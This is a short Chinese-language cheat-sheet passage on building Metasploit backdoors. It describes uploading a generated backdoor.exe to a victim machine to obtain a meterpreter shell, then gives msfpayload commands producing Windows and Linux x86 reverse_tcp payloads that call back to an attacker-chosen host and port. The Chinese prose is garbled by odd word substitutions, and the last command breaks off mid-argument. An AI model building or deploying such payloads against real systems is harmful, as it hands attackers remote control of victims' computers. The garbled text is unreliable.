File
凡是做法是利用msfpayload生成一个backdoor.exe然后上传到方针呆板执行。当地监听即可得到meterpreter shell。
reverse_tcp/http/https => exe => victim => shellreverse_tcp
windows:
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe
Linux(x86)
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell,